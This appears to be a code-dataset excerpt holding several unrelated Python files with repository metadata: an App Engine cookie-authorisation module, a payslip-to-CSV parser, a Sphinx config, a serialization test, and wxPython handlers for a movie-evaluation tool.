org_key = cache.GetKey(organization.Organization, org_id)
key_key = cache.GetKey(Key, key_id)
event_key = cache.GetKey(event_db.Event, event_id)
##org = cache.local_cache.Get(org_key)
org = None # hacked out to force lookup
key = cache.local_cache.Get(key_key)
event = cache.local_cache.Get(event_key)
if not event or not key or not org:
results = memcache.get_multi([org_key, key_key, event_key])
##org = results.get(org_key)
org = None # hacked out to force lookup
key = results.get(key_key)
event = results.get(event_key)
cache.local_cache.Set(org_key, org, 600)
cache.local_cache.Set(key_key, key, 600)
cache.local_cache.Set(event_key, event, 600)
if not org:
org = organization.GetAndCache(org_id)
if not key:
key = GetAndCache(key_id)
if not event:
event = event_db.GetAndCache(event_id)
# Check the age of the key, and delete it
# if it is too old.
if key:
age = datetime.datetime.now() - key.date
if age.days > 14:
key.delete()
key = None
# check the secret org hash and event access
if org and key and event:
secret_matches = (parts[0] == key.hashOrganization(org))
if secret_matches and org.may_access(event):
return org, event
return None, None
| 35.176
| 74
| 0.626791
|
from google.appengine.ext import db
import Cookie
import datetime
import hashlib
import organization
from google.appengine.api import memcache
import cache
import event_db
class Key(db.Model):
secret_key = db.StringProperty(required = True)
date = db.DateTimeProperty(required = True, auto_now_add = True)
def hashOrganization(self, org):
h = hashlib.md5()
h.update(self.secret_key)
h.update(org.name)
h.update(org.password)
h.update(str(self.key().id()))
return h.hexdigest()
def getCookie(self, org, event):
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = (
":".join([self.hashOrganization(org),
str(self.key().id()),
str(org.key().id()),
str(event.key().id())]))
cookie["sandy-recovery-auth"]["domain"] = ""
if not org.only_session_authentication:
expires = datetime.datetime.now() + datetime.timedelta(days = 1)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
one_week_in_seconds = 604800
def GetCached(key_id):
return cache.GetCachedById(Key, one_week_in_seconds, key_id)
def GetAndCache(key_id):
return cache.GetAndCache(Key, one_week_in_seconds, key_id)
def GetDeleteCookie():
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = ""
cookie["sandy-recovery-auth"]["domain"] = ""
expires = datetime.datetime.now() - datetime.timedelta(days = 7)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
def getIntOrNone(s):
try:
return int(s)
except ValueError:
return None
def CheckAuthorization(request):
if "Cookie" in request.headers.keys():
cookie = Cookie.SimpleCookie(request.headers["Cookie"])
if "sandy-recovery-auth" in cookie.keys():
contents = cookie["sandy-recovery-auth"].value
if contents:
parts = contents.split(":")
if len(parts) == 4:
event_id = getIntOrNone(parts[3])
org_id = getIntOrNone(parts[2])
key_id = getIntOrNone(parts[1])
if org_id and key_id and event_id:
org_key = cache.GetKey(organization.Organization, org_id)
key_key = cache.GetKey(Key, key_id)
event_key = cache.GetKey(event_db.Event, event_id)
key = cache.local_cache.Get(key_key)
event = cache.local_cache.Get(event_key)
if not event or not key or not org:
results = memcache.get_multi([org_key, key_key, event_key])
key = results.get(key_key)
event = results.get(event_key)
cache.local_cache.Set(org_key, org, 600)
cache.local_cache.Set(key_key, key, 600)
cache.local_cache.Set(event_key, event, 600)
if not org:
org = organization.GetAndCache(org_id)
if not key:
key = GetAndCache(key_id)
if not event:
event = event_db.GetAndCache(event_id)
if key:
age = datetime.datetime.now() - key.date
if age.days > 14:
key.delete()
key = None
if org and key and event:
secret_matches = (parts[0] == key.hashOrganization(org))
if secret_matches and org.may_access(event):
return org, event
return None, None
| true
| true
|
1c422bf79ecd435d6fec656ed68ebd798c8bf2b3
| 6,981
|
py
|
Python
|
parser.py
|
shtratos/ms-uk-payslip-parser
|
6372ca671d1942cb6d3cd54f6e22cce1dd6852cd
|
[
"MIT"
] | 3
|
2019-12-09T15:32:51.000Z
|
2021-02-08T14:10:30.000Z
|
parser.py
|
shtratos/ms-uk-payslip-parser
|
6372ca671d1942cb6d3cd54f6e22cce1dd6852cd
|
[
"MIT"
] | null | null | null |
parser.py
|
shtratos/ms-uk-payslip-parser
|
6372ca671d1942cb6d3cd54f6e22cce1dd6852cd
|
[
"MIT"
] | 1
|
2022-01-08T16:18:38.000Z
|
2022-01-08T16:18:38.000Z
|
import collections
import csv
import re
import sys
from collections import OrderedDict
from pathlib import Path
HEADER_FIELD = '.m.Pay Date'
FIELDS_ORDER = [
HEADER_FIELD, '.m.Pay', '.m.',
'.d.p',
'.d.d',
'.d.t',
'.d.et',
'.d.ytd',
]
UNWANTED_FIELDS = [
'.m.Company Name', '.m.Account', '.m.Sort Code', '.m.NI Number', '.m.NI Category', '.m.Pay Method',
]
def parse_amount(amount: str):
amount = amount.replace(',', '')
if amount.endswith('-'):
return -float(amount[:-1])
else:
return float(amount)
def parse_metadata(metadata_text: str):
metadata = {}
for row in metadata_text.splitlines():
if not row:
continue
_, cell1, cell2, cell3, _ = row.split('|')
for cell in [cell1, cell2, cell3]:
cell = cell.strip()
if cell:
separator_regex = r':\s+' if ':' in cell else r'\s\s+'
item, value = re.compile(separator_regex).split(cell, maxsplit=1)
metadata[item.strip()] = value.strip()
return metadata
def parse_payments_table(payments_table: str):
payments = {}
deductions = {}
ytd_balances = {}
for row in payments_table.splitlines():
row = row.strip()
if not row:
continue
_, payment, deduction, ytd_balance, _ = row.split('|')
payment = payment.strip()
if payment:
payment_item, amount = re.compile(r'\s\s+').split(payment)
payments[payment_item] = parse_amount(amount)
deduction = deduction.strip()
if deduction:
deduction_item, amount = re.compile(r'\s\s+').split(deduction)
deductions[deduction_item] = parse_amount(amount)
ytd_balance = ytd_balance.strip()
if ytd_balance:
ytd_balance_item, amount = re.compile(r'\s\s+').split(ytd_balance)
ytd_balances[ytd_balance_item] = parse_amount(amount)
return payments, deductions, ytd_balances
def parse_totals(totals_row: str):
totals = {}
_, payment_total, deduction_total, net_pay, _ = totals_row.split('|')
for total_value in [payment_total, deduction_total, net_pay]:
item, amount = re.compile(r':\s+').split(total_value.strip())
totals[item] = parse_amount(amount)
return totals
def parse_employer_totals(employer_total_footer):
totals = {}
for row in employer_total_footer.strip().splitlines()[1:]:
row = row.strip()
if not row or row.count('|') != 4:
continue
_, this_employer_cell, _ = row.split('|', maxsplit=2)
item, amount = re.compile(r'\s\s+').split(this_employer_cell.strip())
totals[item] = parse_amount(amount)
return totals
def parse_payslip(payslip_text: str):
address, metadata, payment_data = re.compile(r"^\s+?-+$", re.MULTILINE).split(payslip_text)
_, payment_headers, payments_table, totals_row, _, employer_total_footer = \
re.compile(r"^\s+?-+\|$", re.MULTILINE).split(payment_data)
metadata = parse_metadata(metadata)
payments, deductions, ytd_balances = parse_payments_table(payments_table)
totals = parse_totals(totals_row)
employer_totals = parse_employer_totals(employer_total_footer)
data = {
'p': payments,
'd': deductions,
'ytd': ytd_balances,
't': totals,
'et': employer_totals
}
return {
# 'address': address,
'm': metadata,
'd': data
}
def print_payslip(dd, indent=""):
for k, v in dd.items():
if not hasattr(v, 'items'):
print(f"{k}:\n{v}")
# print(['*'] * 30)
else:
print(f"{k}:\n")
print_payslip(v, indent=indent + " ")
def count_fields(counts, nested_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
count_fields(counts, v, prefix=prefix + '.' + k)
else:
counts[prefix] += 1
def flatten(nested_dict, flat_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
flatten(v, flat_dict, prefix=prefix + '.' + k)
else:
flat_dict[prefix] = nested_dict
def write_payslip_csv_month_rows(categories, csv_table):
with open('payslips-month-rows.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=categories)
writer.writeheader()
for row in csv_table:
writer.writerow(row)
def write_payslip_csv_month_columns(columns, csv_table):
with open('payslips-month-columns.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=columns)
# writer.writeheader()
for row in csv_table:
writer.writerow(row)
def partition(pred, iterable):
'Use a predicate to partition entries into false entries and true entries'
# partition(is_odd, range(10)) --> 0 2 4 6 8 and 1 3 5 7 9
from itertools import tee
from itertools import filterfalse
t1, t2 = tee(iterable)
return filterfalse(pred, t1), filter(pred, t2)
def enforce_order(iterable, prefixes: list):
remainder = iterable
result = []
for prefix in prefixes:
remainder, matching = partition(lambda x: x.startswith(prefix), remainder)
remainder = list(remainder)
result += sorted(matching)
result += sorted(remainder)
return result
if __name__ == '__main__':
payslips_dir = Path(sys.argv[1])
counts = collections.Counter()
csv_rows_table = []
for payslip_file in sorted(payslips_dir.glob('*.txt')):
# if payslip_file.name < '2018-04-' or payslip_file.name > '2019-04-':
# continue
payslip_text = payslip_file.read_text(encoding='utf-8')
if 'Employee Number' not in payslip_text:
print(f"Skipping {payslip_file} ...")
continue
print(f"Parsing {payslip_file} ...")
payslip = parse_payslip(payslip_text)
count_fields(counts, payslip)
flat_payslip = {}
flatten(payslip, flat_payslip)
csv_rows_table.append(flat_payslip)
categories = counts.keys()
categories = enforce_order(categories, FIELDS_ORDER)
# pprint('\n'.join(categories))
# print(len(categories))
write_payslip_csv_month_rows(categories, csv_rows_table)
for unwanted_field in UNWANTED_FIELDS:
categories.remove(unwanted_field)
csv_cols_table = []
columns = [HEADER_FIELD, *[payslip[HEADER_FIELD] for payslip in csv_rows_table]]
for category in categories:
category_row = OrderedDict()
category_row[HEADER_FIELD] = category
for payslip in csv_rows_table:
month = payslip[HEADER_FIELD]
category_row[month] = payslip.get(category)
csv_cols_table.append(category_row)
write_payslip_csv_month_columns(columns, csv_cols_table)
print("Done.")
| 30.889381
| 103
| 0.624409
|
import collections
import csv
import re
import sys
from collections import OrderedDict
from pathlib import Path
HEADER_FIELD = '.m.Pay Date'
FIELDS_ORDER = [
HEADER_FIELD, '.m.Pay', '.m.',
'.d.p',
'.d.d',
'.d.t',
'.d.et',
'.d.ytd',
]
UNWANTED_FIELDS = [
'.m.Company Name', '.m.Account', '.m.Sort Code', '.m.NI Number', '.m.NI Category', '.m.Pay Method',
]
def parse_amount(amount: str):
amount = amount.replace(',', '')
if amount.endswith('-'):
return -float(amount[:-1])
else:
return float(amount)
def parse_metadata(metadata_text: str):
metadata = {}
for row in metadata_text.splitlines():
if not row:
continue
_, cell1, cell2, cell3, _ = row.split('|')
for cell in [cell1, cell2, cell3]:
cell = cell.strip()
if cell:
separator_regex = r':\s+' if ':' in cell else r'\s\s+'
item, value = re.compile(separator_regex).split(cell, maxsplit=1)
metadata[item.strip()] = value.strip()
return metadata
def parse_payments_table(payments_table: str):
payments = {}
deductions = {}
ytd_balances = {}
for row in payments_table.splitlines():
row = row.strip()
if not row:
continue
_, payment, deduction, ytd_balance, _ = row.split('|')
payment = payment.strip()
if payment:
payment_item, amount = re.compile(r'\s\s+').split(payment)
payments[payment_item] = parse_amount(amount)
deduction = deduction.strip()
if deduction:
deduction_item, amount = re.compile(r'\s\s+').split(deduction)
deductions[deduction_item] = parse_amount(amount)
ytd_balance = ytd_balance.strip()
if ytd_balance:
ytd_balance_item, amount = re.compile(r'\s\s+').split(ytd_balance)
ytd_balances[ytd_balance_item] = parse_amount(amount)
return payments, deductions, ytd_balances
def parse_totals(totals_row: str):
totals = {}
_, payment_total, deduction_total, net_pay, _ = totals_row.split('|')
for total_value in [payment_total, deduction_total, net_pay]:
item, amount = re.compile(r':\s+').split(total_value.strip())
totals[item] = parse_amount(amount)
return totals
def parse_employer_totals(employer_total_footer):
totals = {}
for row in employer_total_footer.strip().splitlines()[1:]:
row = row.strip()
if not row or row.count('|') != 4:
continue
_, this_employer_cell, _ = row.split('|', maxsplit=2)
item, amount = re.compile(r'\s\s+').split(this_employer_cell.strip())
totals[item] = parse_amount(amount)
return totals
def parse_payslip(payslip_text: str):
address, metadata, payment_data = re.compile(r"^\s+?-+$", re.MULTILINE).split(payslip_text)
_, payment_headers, payments_table, totals_row, _, employer_total_footer = \
re.compile(r"^\s+?-+\|$", re.MULTILINE).split(payment_data)
metadata = parse_metadata(metadata)
payments, deductions, ytd_balances = parse_payments_table(payments_table)
totals = parse_totals(totals_row)
employer_totals = parse_employer_totals(employer_total_footer)
data = {
'p': payments,
'd': deductions,
'ytd': ytd_balances,
't': totals,
'et': employer_totals
}
return {
'm': metadata,
'd': data
}
def print_payslip(dd, indent=""):
for k, v in dd.items():
if not hasattr(v, 'items'):
print(f"{k}:\n{v}")
else:
print(f"{k}:\n")
print_payslip(v, indent=indent + " ")
def count_fields(counts, nested_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
count_fields(counts, v, prefix=prefix + '.' + k)
else:
counts[prefix] += 1
def flatten(nested_dict, flat_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
flatten(v, flat_dict, prefix=prefix + '.' + k)
else:
flat_dict[prefix] = nested_dict
def write_payslip_csv_month_rows(categories, csv_table):
with open('payslips-month-rows.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=categories)
writer.writeheader()
for row in csv_table:
writer.writerow(row)
def write_payslip_csv_month_columns(columns, csv_table):
with open('payslips-month-columns.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=columns)
for row in csv_table:
writer.writerow(row)
def partition(pred, iterable):
from itertools import tee
from itertools import filterfalse
t1, t2 = tee(iterable)
return filterfalse(pred, t1), filter(pred, t2)
def enforce_order(iterable, prefixes: list):
remainder = iterable
result = []
for prefix in prefixes:
remainder, matching = partition(lambda x: x.startswith(prefix), remainder)
remainder = list(remainder)
result += sorted(matching)
result += sorted(remainder)
return result
if __name__ == '__main__':
payslips_dir = Path(sys.argv[1])
counts = collections.Counter()
csv_rows_table = []
for payslip_file in sorted(payslips_dir.glob('*.txt')):
payslip_text = payslip_file.read_text(encoding='utf-8')
if 'Employee Number' not in payslip_text:
print(f"Skipping {payslip_file} ...")
continue
print(f"Parsing {payslip_file} ...")
payslip = parse_payslip(payslip_text)
count_fields(counts, payslip)
flat_payslip = {}
flatten(payslip, flat_payslip)
csv_rows_table.append(flat_payslip)
categories = counts.keys()
categories = enforce_order(categories, FIELDS_ORDER)
write_payslip_csv_month_rows(categories, csv_rows_table)
for unwanted_field in UNWANTED_FIELDS:
categories.remove(unwanted_field)
csv_cols_table = []
columns = [HEADER_FIELD, *[payslip[HEADER_FIELD] for payslip in csv_rows_table]]
for category in categories:
category_row = OrderedDict()
category_row[HEADER_FIELD] = category
for payslip in csv_rows_table:
month = payslip[HEADER_FIELD]
category_row[month] = payslip.get(category)
csv_cols_table.append(category_row)
write_payslip_csv_month_columns(columns, csv_cols_table)
print("Done.")
| true
| true
|
1c422c3e02bebbc8def8f727bb5f9427050dd1c2
| 5,960
|
py
|
Python
|
docs/source/conf.py
|
LourensVeen/simple-cwl-xenon-service
|
f8ff51629d1198200bd84d59e78ca456321af940
|
[
"Apache-2.0"
] | 10
|
2017-09-07T10:25:33.000Z
|
2021-01-20T00:32:31.000Z
|
docs/source/conf.py
|
MD-Studio/cerise
|
f8ff51629d1198200bd84d59e78ca456321af940
|
[
"Apache-2.0"
] | 52
|
2017-08-22T09:53:35.000Z
|
2021-08-19T08:24:16.000Z
|
docs/source/conf.py
|
LourensVeen/simple-cwl-xenon-service
|
f8ff51629d1198200bd84d59e78ca456321af940
|
[
"Apache-2.0"
] | 3
|
2017-11-13T22:01:37.000Z
|
2021-08-14T10:50:21.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# cerise documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 19 10:25:17 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.todo',
'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'cerise'
copyright = '2017 Netherlands eScience Center and VU University Amsterdam'
author = 'Lourens Veen'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'develop'
# The full version, including alpha/beta/rc tags.
release = 'develop'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# Also document constructors.
autoclass_content = 'both'
# -- Run apidoc plug-in manually, as readthedocs doesn't support it -------
# See https://github.com/rtfd/readthedocs.org/issues/1139
def run_apidoc(_):
from sphinx.apidoc import main
cur_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(cur_dir, '..', '..', 'cerise'))
module = os.path.join(cur_dir, '..', '..', 'cerise')
output_dir = os.path.join(cur_dir, 'apidocs')
main(['-e', '-o', output_dir, module, '--force'])
def setup(app):
app.connect('builder-inited', run_apidoc)
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'cerisedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'cerise.tex', 'Cerise Documentation',
'Lourens Veen', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cerise', 'Cerise Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'cerise', 'Cerise Documentation',
author, 'cerise', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| 30.408163
| 79
| 0.677685
|
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.todo',
'sphinx.ext.viewcode']
source_suffix = '.rst'
master_doc = 'index'
project = 'cerise'
copyright = '2017 Netherlands eScience Center and VU University Amsterdam'
author = 'Lourens Veen'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'develop'
# The full version, including alpha/beta/rc tags.
release = 'develop'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# Also document constructors.
autoclass_content = 'both'
# -- Run apidoc plug-in manually, as readthedocs doesn't support it -------
def run_apidoc(_):
from sphinx.apidoc import main
cur_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(cur_dir, '..', '..', 'cerise'))
module = os.path.join(cur_dir, '..', '..', 'cerise')
output_dir = os.path.join(cur_dir, 'apidocs')
main(['-e', '-o', output_dir, module, '--force'])
def setup(app):
app.connect('builder-inited', run_apidoc)
html_theme = 'sphinx_rtd_theme'
htmlhelp_basename = 'cerisedoc'
latex_elements = {
}
latex_documents = [
(master_doc, 'cerise.tex', 'Cerise Documentation',
'Lourens Veen', 'manual'),
]
man_pages = [
(master_doc, 'cerise', 'Cerise Documentation',
[author], 1)
]
texinfo_documents = [
(master_doc, 'cerise', 'Cerise Documentation',
author, 'cerise', 'One line description of project.',
'Miscellaneous'),
]
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
epub_exclude_files = ['search.html']
| true
| true
|
1c422cfb212b27838ec057a950c0547282063541
| 1,320
|
py
|
Python
|
pyzoo/test/zoo/serving/test_serialization.py
|
hkvision/analytics-zoo
|
aee693a0604db5b5d01540d5d414b644313d5d22
|
[
"Apache-2.0"
] | null | null | null |
pyzoo/test/zoo/serving/test_serialization.py
|
hkvision/analytics-zoo
|
aee693a0604db5b5d01540d5d414b644313d5d22
|
[
"Apache-2.0"
] | 1
|
2020-11-19T09:18:01.000Z
|
2020-11-20T07:14:21.000Z
|
pyzoo/test/zoo/serving/test_serialization.py
|
hkvision/analytics-zoo
|
aee693a0604db5b5d01540d5d414b644313d5d22
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import base64
from zoo.serving.client import InputQueue, OutputQueue, http_response_to_ndarray
import os
resource_path = os.path.join(os.path.split(__file__)[0], "../resources")
class TestSerialization:
def test_encode(self):
input_api = InputQueue()
b64 = input_api.data_to_b64(t1=np.array([1, 2]), t2=np.array([3, 4]))
byte = base64.b64decode(b64)
def test_http_response_to_ndarray(self):
with open(os.path.join(resource_path, "serving/http_response")) as f:
data = f.read()
arr = http_response_to_ndarray(data)
assert isinstance(arr, np.ndarray)
assert len(arr.shape) == 1
assert arr.shape[0] == 128
| 32.195122
| 80
| 0.701515
|
import numpy as np
import base64
from zoo.serving.client import InputQueue, OutputQueue, http_response_to_ndarray
import os
resource_path = os.path.join(os.path.split(__file__)[0], "../resources")
class TestSerialization:
def test_encode(self):
input_api = InputQueue()
b64 = input_api.data_to_b64(t1=np.array([1, 2]), t2=np.array([3, 4]))
byte = base64.b64decode(b64)
def test_http_response_to_ndarray(self):
with open(os.path.join(resource_path, "serving/http_response")) as f:
data = f.read()
arr = http_response_to_ndarray(data)
assert isinstance(arr, np.ndarray)
assert len(arr.shape) == 1
assert arr.shape[0] == 128
| true
| true
|
1c422d734a930cbdf97d4c899dd2c2c62930bff4
| 9,073
|
py
|
Python
|
src/wx/event_handlers.py
|
z80lives/affective-movie-evaluator
|
c22e0d75166c9c26cbca276c70b38c1f6419bfe0
|
[
"MIT"
] | null | null | null |
src/wx/event_handlers.py
|
z80lives/affective-movie-evaluator
|
c22e0d75166c9c26cbca276c70b38c1f6419bfe0
|
[
"MIT"
] | 1
|
2019-11-16T23:43:28.000Z
|
2019-11-16T23:43:28.000Z
|
src/wx/event_handlers.py
|
z80lives/affective-movie-evaluator
|
c22e0d75166c9c26cbca276c70b38c1f6419bfe0
|
[
"MIT"
] | null | null | null |
import wx
from src.playback import RecordSystem, VLCPlayer
from src.utils import SampleLoader, SampleController, MovieController, PersonController
from src.wx.record import RecordTabPanel, CameraCaptureFrame
from src.wx.analyse_movie import AnalyseMovieTabPanel
from src.wx.samples import SampleTabPanel, SampleTabFrame
#from src.wx.analyse import AnalyseMovieTab
from src.wx.movies import MoviesPanel
from src.wx.person import PersonPanel
from src.gsr import GSRSensor
def analyse_func(video_dir, video_file_name, fer,head,body,preview,_print):
if fer:
_print("Analysing facial keypoints...")
from FER.ferAnalysis import FaceSystem
system = FaceSystem()
system.analyse(video_file_name, preview)
if head:
from src.headpose import HeadPoseEstimator
sys = HeadPoseEstimator()
#sys._print = _print
_print("Analysing body keypoints...")
loader = SampleLoader(video_dir)
sys.analyse(loader.getVideoFile(), loader.getDir()+"head_points.npy", preview)
if body:
_print("Initializing pose system")
from src.openpose import PoseSystem
sys = PoseSystem()
_print("Analysing body keypoints ")
loader = SampleLoader(kwargs["filename"])
sys.analyse(loader.getVideoFile(), loader.getDir()+"body_points.npy", preview)
class CPanelEventHandlers:
recordTab = None
moviesTab = None
personTab = None
analyse_process=None
def onQuit(self, event):
self.Close(True)
def onAbout(self, event):
msg = "Created by Ibrahim & Faith for FYP\n\t HELP School of ICT \n\t 2019"
dlg = wx.MessageDialog(self, msg, "Affective Movie Evaluator", wx.OK)
dlg.ShowModal()
dlg.Destroy()
#print()
def newRecord(self, event):
self.print("Creating a new record")
def onNewSample(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.recordSystem = RecordSystem()
controllers.mediaplayer = VLCPlayer
#controllers.gsr = GSRSensor()
recordTab = RecordTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
self.Layout()
def onMovieAnalyse(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.mediaplayer = VLCPlayer
controllers.sampleController.read_dirs()
screeningTab = AnalyseMovieTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(screeningTab, "Screening Tab")
self.Layout()
def onNewScreening(self, event):
pass
def onNew(self, event):
#file selector dialog
with wx.FileDialog(self, "Open a movie file", wildcard="mp4 files (*.mp5)|*.mp4",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
sys = RecordSystem()
msys = MovieController()
msys.read_files()
mdata = msys.getMovieByFile(pathname)
#try:
# with open(pathname, 'r') as file:
# self.doLoadDataOrWhatever(file)
#except IOError:
# wx.LogError("Cannot open file '%s'." % newfile)
#open the tab later
recordTab = RecordTabPanel(self.panel_notebook, self)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
#auto fill text fields
recordTab.form.txtMovieFile.SetValue(pathname)
inp_map = {
"name": recordTab.form.txtMovieName,
"year": recordTab.form.txtYear,
"genre": recordTab.form.txtGenre,
"tags": recordTab.form.txtTag
}
self.recordTab = recordTab
for k in inp_map:
try:
inpField = inp_map[k]
inpField.SetValue(mdata[k])
except KeyError: #ignore if key doesnt exist
continue
#self.do_layout()
self.Layout()
def onMoviesTab(self, event):
if self.moviesTab is None:
tab_title = "Movies Panel"
movieController = MovieController()
moviesTab = MoviesPanel(self.panel_notebook, self, tab_title, movieController)
idx = self.panel_notebook.AddPage(moviesTab, tab_title)
self.moviesTab = moviesTab
else:
self.moviesTab.onCloseTab(event)
def onPersonTab(self, event):
if self.personTab is None:
tab_title = "Person Panel"
person_controller = PersonController()
personTab = PersonPanel(self.panel_notebook, self, tab_title, person_controller)
idx = self.panel_notebook.AddPage(personTab, tab_title)
self.personTab = personTab
else:
self.personTab.onCloseTab(event)
def onCloseTab(self, event):
self.delPage("Record Screening")
self.Layout()
def onCloseAnalyserTab(self, event):
self.onStopProcess(event)
self.delPage("Analyse Sample")
self.Layout()
def onRecord(self, event, form):
sys = RecordSystem()
msys = MovieController()
msys.read_files()
person = form.txtPerson.GetValue()
movie_path = form.txtMovieFile.GetValue()
mdata = msys.getMovieByFile(movie_path)
file_name = msys.get_dir() + msys.getMovieObjById(mdata['id']).filename
data = {"movie_id": "%s"%(mdata["id"]),"subject_name": person}
player = VLCPlayer(file_name)
sys = RecordSystem()
filename = sys.createSampleDir()
sys.saveMetaData(filename, data)
sys.start_recording("sample", player, False, filename)
self.print("Record complete...")
self.print("New sample created. sample_id= %s"%(filename))
def onSampleMenu(self, event):
if self.recordTab is not None:
self.recordTab.Close()
#print("Sample Menu")
#sampleTab = SampleTabPanel(self.panel_notebook, self)
#self.panel_notebook.AddPage(sampleTab, "Sample Records")
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
sampleFrame = SampleTabFrame(controllers)
